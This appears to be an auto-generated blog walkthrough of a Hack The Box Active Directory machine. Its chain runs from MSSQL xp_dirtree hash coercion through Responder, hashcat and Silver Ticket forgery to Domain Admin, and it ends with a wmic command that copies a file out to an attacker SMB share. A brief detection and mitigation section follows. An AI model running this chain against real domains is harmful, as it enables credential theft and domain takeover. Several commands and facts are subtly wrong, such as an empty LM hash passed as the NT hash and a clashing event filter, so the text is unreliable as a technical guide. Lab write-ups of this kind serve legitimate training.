Listen to this Post
Introduction:
In the complex landscape of Active Directory penetration testing, a seemingly minor misconfiguration in a Microsoft SQL Server can cascade into a complete domain compromise. The attack chain demonstrated on Hack The Box’s “Signed” machine reveals the critical intersection of database security, Windows authentication protocols, and Kerberos delegation flaws that continue to plague enterprise environments.
Learning Objectives:
- Understand how to leverage MSSQL stored procedures for initial network foothold
- Master NTLM hash capture and relay techniques using modern tools
- Learn Silver Ticket forgery for privileged group impersonation and domain escalation
You Should Know:
1. Initial MSSQL Foothold via xp_dirtree
`sqsh -S 10.10.10.10 -U lowpriv_user -P password123`
`EXEC master..xp_dirtree ‘\\192.168.1.100\share’;`
This command sequence establishes a connection to the vulnerable MSSQL instance and executes the xp_dirtree stored procedure, forcing the SQL service account to authenticate to an attacker-controlled SMB share. The xp_dirtree function lists directories but when pointed to a remote share, it leaks the service account’s NTLM hash through SMB authentication attempts.
2. NTLM Hash Capture with Responder
`responder -I eth0 -wF`
`[+] Listening for events…`
`[bash] NTLMv2-SSP Client : 10.10.10.10`
`[bash] NTLMv2-SSP Username : SIGNED\sqlservice`
`[bash] NTLMv2-SSP Hash : sqlservice::SIGNED:1122334455667788:2F91BD1234ABCD…`
Responder passively listens for various network protocols and captures authentication attempts. When the MSSQL service attempts to connect to the fake share, Responder intercepts the NTLMv2 handshake, capturing the hash that can be cracked offline or relayed to other services.
3. Password Cracking with Hashcat
`hashcat -m 5600 captured_ntlmv2.hash /usr/share/wordlists/rockyou.txt -O`
`hashcat –show captured_ntlmv2.hash`
`sqlservice::SIGNED:1122334455667788:2F91BD1234ABCD…:Password123!`
Using Hashcat with mode 5600 (NTLMv2) against common wordlists often reveals weak service account passwords. The cracked credentials provide initial authenticated access to the domain, enabling further reconnaissance and privilege escalation opportunities.
4. Kerberos Silver Ticket Generation
`python ticketer.py -nthash aad3b435b51404eeaad3b435b51404ee -domain signed.htb -domain-sid S-1-5-21-123456789-123456789-123456789 -spn MSSQLSvc/sql01.signed.htb:1433 -user-id 500 -groups 512,513,518,519,520 sqlservice`
`export KRB5CCNAME=/root/sqlservice.ccache`
Silver Tickets are forged Ticket Granting Service (TGS) tickets that allow attackers to generate authentication tokens for specific services without interacting with the Domain Controller. By using the service account’s NTLM hash, we can create tickets with elevated group memberships like Domain Admins (group 512).
5. Domain Privilege Escalation Verification
`klist`
`Ticket cache: FILE:/root/sqlservice.ccache`
`Default principal: [email protected]`
`08/15/2024 10:30:00 08/15/2024 20:30:00 MSSQLSvc/sql01.signed.htb:1433`
`kerberos::ptt sqlservice.ccache`
`mimikatz privilege::debug`
`mimikatz sekurlsa::tickets`
The kerberos ticket is injected into the current session using mimikatz’s Pass-the-Ticket functionality. Verification commands confirm the ticket is active and contains the forged group memberships, enabling access to previously restricted domain resources.
6. Domain Admin Access and Flag Capture
`dir \\dc01.signed.htb\C$\Users\Administrator\Desktop\root.txt`
`type \\dc01.signed.htb\C$\Users\Administrator\Desktop\root.txt`
`HTB{s1lv3r_t1ck3t_d0m1n4t10n}`
`wmic /node:dc01.signed.htb process call create “cmd.exe /c type C:\Users\Administrator\Desktop\root.txt > \\192.168.1.100\share\root.txt”`
With the forged Silver Ticket providing Domain Admin privileges, the attacker can directly access the Domain Controller’s file system and retrieve both user and root flags. Multiple methods exist for file access, including SMB shares and WMI execution.
7. Detection and Mitigation Commands
`Get-WinEvent -FilterHashtable @{LogName=’Security’; ID=’4769′} | Where-Object {$_.Message -like “0x40810000”} | Format-List`
`Set-SQLServerConfiguration -ShowAdvancedOptions 1`
`EXEC sp_configure ‘xp_cmdshell’, 0;`
`RECONFIGURE;`
`Get-ADUser -Filter -Properties ServicePrincipalName | Where-Object {$_.ServicePrincipalName -ne “$null”}`
Monitoring Security event ID 4769 for ticket encryption type 0x17 (RC4) can detect Silver Ticket usage. Disabling unnecessary stored procedures and regularly rotating service account passwords are critical mitigation steps. Regular auditing of SPN-linked accounts reduces attack surface.
What Undercode Say:
- Silver Ticket attacks bypass Golden Ticket detection mechanisms by targeting specific services rather than the entire domain
- The persistence of RC4 encryption in many enterprise environments enables these attacks despite known vulnerabilities
- MSSQL misconfigurations remain a primary initial access vector in complex AD environments
The technical sophistication demonstrated in this attack chain highlights the critical need for defense-in-depth strategies. While individual vulnerabilities might seem minor—an enabled stored procedure here, a weak service account password there—their combination creates catastrophic failure scenarios. Modern enterprises must prioritize monitoring for anomalous Kerberos ticket requests, implement service account management policies, and migrate from NTLM to more secure authentication protocols. The fact that this entire compromise stemmed from a single stored procedure execution should serve as a wake-up call for database administrators and security teams worldwide.
Prediction:
As Kerberos-based attacks become more refined, we’ll see increased automation of Silver Ticket generation integrated into penetration testing frameworks. Defensive technologies will evolve toward behavioral analysis of service ticket usage patterns, but legacy system dependencies will ensure these attacks remain viable for the next 3-5 years. The emergence of quantum computing may eventually break current encryption standards, forcing a complete Kerberos protocol overhaul by 2028.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mrhaseeb Owned – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
